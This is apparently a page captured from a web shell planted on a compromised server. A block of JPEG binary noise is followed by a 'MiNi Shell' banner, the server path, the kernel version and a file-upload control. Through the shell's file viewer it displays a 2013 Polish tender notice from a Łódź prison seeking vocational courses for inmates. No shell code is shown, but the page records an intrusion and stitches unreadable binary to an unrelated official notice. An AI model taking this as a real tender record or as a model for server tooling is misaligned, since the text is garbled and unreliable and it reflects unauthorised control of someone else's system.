JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130604/214448-N-2013.html

<p class="kh_header"><b>Łódź: przeprowadzenie 3 kursów kwalifikacyjnych dla osadzonych odbywających karę pozbawienia wolności w Zakładzie Karnym Nr 1 w Łodzi,</b><br>
<b>Numer ogłoszenia: 214448 - 2013; data zamieszczenia: 04.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny nr 1 w Łodzi , ul. Beskidzka 54, 91-612 Łódź, woj. łódzkie, tel. 042 6750415, 6750415, faks 042 6750500.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka penitencjarna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przeprowadzenie 3 kursów kwalifikacyjnych dla osadzonych odbywających karę pozbawienia wolności w Zakładzie Karnym Nr 1 w Łodzi,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie 3 kursów kwalifikacyjnych:
CZĘŚĆ I: Kurs Brukarz
1. Ilość uczestników kursu - 10.
2. Ilość godzin lekcyjnych - 94 godz. dydaktycznych na 1 uczestnika (w tym: 24 godziny zajęć teoretycznych oraz 70 godzin zajęć praktycznych), 1 godzina lekcyjna - 45 minut.
3. Termin realizacji: zakończenie kursu do dnia 26 lipca 2013 r.
4. Zajęcia odbywać się będą sukcesywnie w dni powszednie (z wyłączeniem sobót, niedziel i dni świątecznych) w godzinach pomiędzy 8.30 - 15.30 i nie będą trwać dłużej niż 8 godzin lekcyjnych dziennie - część teoretyczna, 7 godz. lekcyjnych dziennie - część praktyczna.
5. Wykonawca przeprowadzi badania lekarskie 13 osadzonym (10 uczestników oraz 3 osoby z listy rezerwowej) dopuszczające do podjęcia udziału w kursie (lekarz medycyny pracy). Badania lekarskie odbędą się na terenie Zakładu Karnego Nr 1 w Łodzi. Potwierdzone za zgodność
z oryginałem kopie zaświadczeń lekarskich Wykonawca przedstawi Zamawiającemu pierwszego dnia zajęć kursowych.
6. Wykonawca zakupi odzież ochronną (przynajmniej: spodnie + bluza/koszula + czapka) obuwie robocze oraz podstawowe środki ochrony indywidualnej (przynajmniej: nakolanniki, rękawiczki oraz środki ochrony oczu, twarzy) dla każdego uczestnika kursu, stosownie do istniejącego zagrożenia oraz warunków panujących w czasie trwania zajęć praktycznych.
7. Wykonawca zapewni komplet narzędzi potrzebnych do nauki zawodu oraz zapewni taką ilość materiałów budowlanych, która pozwoli na prawidłowe przeprowadzenie zajęć praktycznych
w czasie trwania kursu, a także wszelkie niezbędne materiały szkoleniowe potrzebne do realizacji przedmiotu zamówienia.
8. Wykonawca zakupi i dostarczy uczestnikom materiały niezbędne do prawidłowego przeprowadzenia zajęć praktycznych, według cen i asortymentu wskazanego przez Zamawiającego w uzgodnieniu z Wykonawcą. Wartość materiałów niezbędnych do prawidłowego przeprowadzenia zajęć praktycznych nie może przekroczyć 40% ceny całego kursu. Ilość materiałów powinna być dostosowana do ilości godzin lekcyjnych oraz ilości uczestników, tak, aby każdego dnia w czasie trwania kursu, każdy uczestnik mógł aktywnie uczestniczyć w zajęciach praktycznych.
9. Wykonawca zobowiązuje się do dokładnego dokumentowania preliminowanych wydatków, poniesionych w trakcie kursów. Wykonawca przedłoży Zamawiającemu przed dokonaniem ostatecznego rozliczenia potwierdzonych za zgodność, kopie faktur VAT lub rachunków potwierdzających dostarczenie w wymaganej ilości materiałów i narzędzi do przeprowadzenia praktycznej nauki zawodu w ramach kursu.
10. Zamawiający zapewni na terenie Zakładu Karnego Nr 1 w Łodzi salę do przeprowadzenia zajęć teoretycznych wyposażoną w stanowiska komputerowe, rzutnik multimedialny, drukarkę - sprzęt zakupiony w ramach projektu przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, oraz miejsca na terenie jednostki do przeprowadzenia zajęć praktycznych.
11. Zamawiający w zakresie zajęć praktycznych zapewnia narzędzia i sprzęt zakupiony w ramach projektu ze środków Europejskiego Funduszu Społecznego oraz budżetu państwa tj.: przecinarkę stołową, przedłużacze bębnowe, zagęszczarkę do gruntu, chwytak. Pozostałe narzędzia i sprzęt niezbędny do wykonania ćwiczeń związanych z zakresem kursu zapewnia Wykonawca. Wykonawca zapewnia benzynę do zagęszczarki, którą dysponuje Zakład Karny Nr 1 w Łodzi.

CZĘŚĆ II: Kurs Technolog robót wykończeniowych
1. Ilość uczestników kursu - 10.
2. Ilość godzin lekcyjnych - 94 godz. dydaktycznych na 1 uczestnika (w tym: 24 godziny zajęć teoretycznych oraz 70 godzin zajęć praktycznych), 1 godzina lekcyjna - 45 minut.
3. Termin realizacji: od 23 września do 8 listopada 2013 r.
4. Zajęcia odbywać się będą sukcesywnie w dni powszednie (z wyłączeniem sobót, niedziel i dni świątecznych) w godzinach pomiędzy 8.30 - 15.30 i nie będą trwać dłużej niż 8 godzin lekcyjnych dziennie - część teoretyczna, 7 godz. lekcyjnych dziennie - część praktyczna.
5. Wykonawca przeprowadzi badania lekarskie 13 osadzonym (10 uczestników oraz 3 osoby z listy rezerwowej) dopuszczające do podjęcia udziału w kursie (lekarz medycyny pracy). Badania lekarskie odbędą się na terenie Zakładu Karnego Nr 1 w Łodzi. Potwierdzone za zgodność
z oryginałem kopie zaświadczeń lekarskich Wykonawca przedstawi Zamawiającemu pierwszego dnia zajęć kursowych.
6. Wykonawca zakupi odzież ochronną (przynajmniej: spodnie + bluza/koszula + czapka) obuwie robocze oraz podstawowe środki ochrony indywidualnej (przynajmniej: rękawiczki oraz środki ochrony oczu, twarzy) dla każdego uczestnika kursu, stosownie do istniejącego zagrożenia oraz warunków panujących w czasie trwania zajęć praktycznych.
7. Wykonawca zapewni komplet narzędzi potrzebnych do nauki zawodu oraz zapewni taką ilość materiałów budowlanych, która pozwoli na prawidłowe przeprowadzenie zajęć praktycznych
w czasie trwania kursu, a także wszelkie niezbędne materiały szkoleniowe potrzebne do realizacji przedmiotu zamówienia.
8. Wykonawca zakupi i dostarczy uczestnikom materiały niezbędne do prawidłowego przeprowadzenia zajęć praktycznych, według cen i asortymentu wskazanego przez Zamawiającego w uzgodnieniuz Wykonawcą. Wartość materiałów niezbędnych do prawidłowego przeprowadzenia zajęć praktycznych nie może przekroczyć 40% ceny całego kursu. Ilość materiałów powinna być dostosowana do ilości godzin lekcyjnych oraz ilości uczestników, tak, aby każdego dnia w czasie trwania kursu, każdy uczestnik mógł aktywnie uczestniczyć w zajęciach praktycznych.
9. Wykonawca zobowiązuje się do dokładnego dokumentowania preliminowanych wydatków, poniesionych w trakcie kursów. Wykonawca przedłoży Zamawiającemu przed dokonaniem ostatecznego rozliczenia potwierdzonych za zgodność, kopie faktur VAT lub rachunków potwierdzających dostarczenie w wymaganej ilości materiałów i narzędzi do przeprowadzenia praktycznej nauki zawodu w ramach kursu.
10. Zamawiający zapewni na terenie Zakładu Karnego Nr 1 w Łodzi salę do przeprowadzenia zajęć teoretycznych wyposażoną w stanowiska komputerowe, rzutnik multimedialny, drukarkę - sprzęt zakupiony w ramach projektu przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, oraz miejsca na terenie jednostki do przeprowadzenia zajęć praktycznych.
11. Zamawiający w zakresie zajęć praktycznych zapewnia narzędzia i sprzęt zakupiony w ramach projektu ze środków Europejskiego Funduszu Społecznego oraz budżetu państwa tj.: mieszarkę, wiertarko - wkrętarkę, wykrywacz metali, przecinarkę stołową, drabiny, malowarkę, przedłużacze bębnowe. Pozostałe narzędzia i sprzęt niezbędny do wykonania ćwiczeń związanych z zakresem kursu zapewnia Wykonawca.


CZĘŚĆ III: Kurs Podstawy obsługi komputera z komputerowym fakturowaniem
1. Ilość uczestników kursu - 11.
2. Ilość godzin lekcyjnych - 100 godz. dydaktycznych na 1 uczestnika (w tym: 42 godziny zajęć podstaw obsługi komputera, 58 godzin modułu z programem fakturowania), 1 godzina lekcyjna - 45 minut.
3. Termin realizacji: zakończenie kursu do dnia 15 listopada 2013 r.
4. Zajęcia odbywać się będą sukcesywnie w dni powszednie (z wyłączeniem sobót, niedziel i dni świątecznych) w godzinach pomiędzy 9.00 - 15.30 i nie powinny trwać dłużej niż 7 godzin lekcyjnych dziennie. 
5. Wykonawca przeprowadzi badania lekarskie 14 osadzonym (11 uczestników oraz 3 osoby z listy rezerwowej) dopuszczające do podjęcia udziału w kursie (lekarz medycyny pracy). Badania lekarskie odbędą się na terenie Zakładu Karnego Nr 1 w Łodzi. Potwierdzone za zgodność
z oryginałem kopie zaświadczeń lekarskich Wykonawca przedstawi Zamawiającemu pierwszego dnia zajęć kursowych.
6. Zamawiający zobowiązuje się do zapewnienia pomieszczenia wyposażonego w 11 stanowisk komputerowych z systemem Microsoft Windows XP Professional wraz z pakietem OpenOffice, rzutnik multimedialny, drukarkę. Ww sprzęt zakupiony został ze środków Europejskiego Funduszu Społecznego w ramach realizacji projektu.

DOTYCZY WSZYSTKICH CZĘŚĆI
1. Instytucja szkoląca zobowiązuje się do przestrzegania przepisów wewnętrznych obowiązujących na terenie jednostki (w szczególności Wykonawca zobowiązuje się do każdorazowego poinformowania drogą mailową lub telefoniczną o ilości wchodzących osób na teren jednostki przedstawiając dane tych osób na co najmniej dzień przed planowanym wejściem do godz. 13:00 oraz poinformowani o wnoszonych przedmiotach: laptop, nośniki danych).
2. W ramach szkolenia Wykonawca musi zaznajomić uczestników kursu z zagadnieniami w danym zakresie tematycznym oraz w zakresie BHP i ppoż oraz zapewni w trakcie trwania kursu warunki pracy zgodne z przepisami BHP.
3. Wykonawca zakupi i dostarczy uczestnikom kursów niezbędne środki i materiały dydaktyczne do nauki zajęć m.in. skrypty, aktualne podręczniki, materiały papiernicze, przybory do pisania, oraz dodatkowe środki dydaktyczne i materiały (w przypadku przekazania podręczników dla osadzonych w protokole odbioru materiałów szkoleniowych należy wpisać nr ISBN lub tytuł publikacji i jej autora). Dodatkowo dla Zamawiającego należy przekazać kserokopie materiałów dydaktycznych potwierdzone za zgodność z oryginałem, celem dołączenia do dokumentacji projektowej.
4. Wykonawca zobowiązuje się do ubezpieczenia NNW uczestników kursu podczas trwania szkolenia i udokumentowania tego faktu przed ich rozpoczęciem.
5. Zamawiający nie będzie przekazywał danych osobowych uczestników kursu. Wszelkie dane osobowe niezbędne do prawidłowego przeprowadzenia kursu Wykonawca uzyskuje samodzielnie bezpośrednio od osadzonych z chwilą rozpoczęcia kursu.
6. Wykonawca zobowiązuje się do przekazania Zamawiającemu w dniu podpisania umowy o usługę przeprowadzenia kursu następujących dokumentów:
a) programu szkolenia zawierającego elementy wymienione w § 75 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177, poz. 1193 z późn zm.),
b) harmonogramu kursu (zawierający podział na dni oraz godziny w uwzględnieniu zajęć teoretycznych oraz praktycznych szkolenia),
c) wzoru zaświadczenia jakie otrzymają uczestnicy po zakończeniu kursu,
d) wzoru ankiety oceny szkolenia.
Ww. dokumenty powinny zostać właściwie ologowane oraz oznaczone zgodnie z wytycznymi Ministerstwa Rozwoju Regionalnego dotyczącymi oznaczania projektów w ramach POKL z dnia 04.02.2009 r. (nie dotyczy wzoru zaświadczenia)
7. Wykonawca wyda uczestnikom stosowne zaświadczenia potwierdzające ukończenie szkolenia, zgodne ze wzorem stanowiącym załącznik nr 5 do rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U poz. 186) oraz certyfikaty o ukończeniu kursu, zawierające informację o współfinansowaniu kursu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
8. Wykonawca prowadzić będzie dokumentację przebiegu kształcenia, którą będzie stanowił:
a) program nauczania,
b) dziennik zajęć edukacyjnych, zawierający: dane uczestników kursu, liczbę godzin zajęć, tematy zajęć edukacyjnych oraz adnotacje obecności uczestników,
c) rejestr wydanych zaświadczeń potwierdzających ukończenie kursu,
d) ankiety oceny szkolenia i wykładowcy dla każdego uczestnika kursu;
e) wyszczególnienie materiałów szkoleniowych i sposobów ich przekazania uczestnikom kursu;
Instytucja szkoleniowa przeprowadzi kurs zgodnie z obowiązującymi przepisami prawnymi
w szczególności z rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r.
w sprawie kształcenia ustawicznego w formach pozaszkolnych (DZ. U. Poz. 186), oraz
z rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych (DZ. U. nr 37 poz. 337 z późn. zm.).
9. Wykonawca zobowiązany jest dostarczyć Zamawiającemu w terminie 7 dni od zakończenia kursu kserokopie poświadczone za zgodność z oryginałem przez uprawnioną osobę lub oryginały następujących dokumentów:
a) dziennika zajęć,
b) listy obecności uczestników szkolenia,
c) listę uczestników z przeprowadzonego przeszkolenia BHP,
d) ankiet oceniających szkolenie,
e) listy potwierdzające odbiór materiałów szkoleniowych (na potwierdzeniu należy wyszczególnić ilość materiałów dydaktycznych przypadających na jednego uczestnika), 
f) kosztorys powykonawczy,
g) oryginały zaświadczeń + kopie oraz rejestr wydanych zaświadczeń,
h) oryginały certyfikatów + kopie oraz rejestr wydanych certyfikatów,
i) protokół odbioru zaświadczeń i certyfikatów - kopia,
j) protokół odbioru usługi,
10. Wykonawca zobowiąże się do przechowywania dokumentacji szkoleniowej do końca 2020 roku
w sposób zapewniający dostępność, poufność i bezpieczeństwo oraz do poinformowania Zakładu Karnego Nr 1 w Łodzi o miejscu archiwizacji dokumentów związanych z przeprowadzonym szkoleniem.
11. Wykonawca zobowiąże się do umożliwienia uprawnionym instytucjom zewnętrznym kontroli szkoleń sfinansowanych przez beneficjenta ze środków finansowych projektu w zakresie i na zasadach wynikających z obowiązujących przepisów.
12. Wszelka dokumentacja dotycząca szkolenia oraz materiały dydaktyczne muszą zawierać zapis
o współfinansowaniu szkolenia przez Unię Europejską ze środków Europejskiego Fundusz Społecznego oraz być oznaczone odpowiednimi logotypami, zgodnie z wytycznymi Ministerstwa Rozwoju Regionalnego dotyczącymi oznaczania projektów w ramach POKL z dnia 04.02.2009 r. (nie dotyczy wzoru zaświadczenia)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający dokona oceny spełnienia warunków na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych /załącznik nr 2/.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunków na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych /załącznik nr 2/.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunków na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych /załącznik nr 2/.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunków na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych /załącznik nr 2/.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunków na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych /załącznik nr 2/.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunków na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych /załącznik nr 2/.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Nr 1 
ul. Beskidzka 54 
91-612 Łódź
godziny urzędowania 8.00-16.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2013 godzina 12:00, miejsce: Zakład Karny Nr 1 
ul. Beskidzka 54 
91-612 Łódź
godziny urzędowania 8.00-16.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 1.3.4 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs Brukarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Brukarz
1. Ilość uczestników kursu - 10.
2. Ilość godzin lekcyjnych - 94 godz. dydaktycznych na 1 uczestnika (w tym: 24 godziny zajęć teoretycznych oraz 70 godzin zajęć praktycznych), 1 godzina lekcyjna - 45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs Technolog robót wykończeniowych
..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Technolog robót wykończeniowych
1. Ilość uczestników kursu - 10.
2. Ilość godzin lekcyjnych - 94 godz. dydaktycznych na 1 uczestnika (w tym: 24 godziny zajęć teoretycznych oraz 70 godzin zajęć praktycznych), 1 godzina lekcyjna - 45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs Podstawy obsługi komputera z komputerowym fakturowaniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Podstawy obsługi komputera z komputerowym fakturowaniem
1. Ilość uczestników kursu - 11.
2. Ilość godzin lekcyjnych - 100 godz. dydaktycznych na 1 uczestnika (w tym: 42 godziny zajęć podstaw obsługi komputera, 58 godzin modułu z programem fakturowania), 1 godzina lekcyjna - 45 minut..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com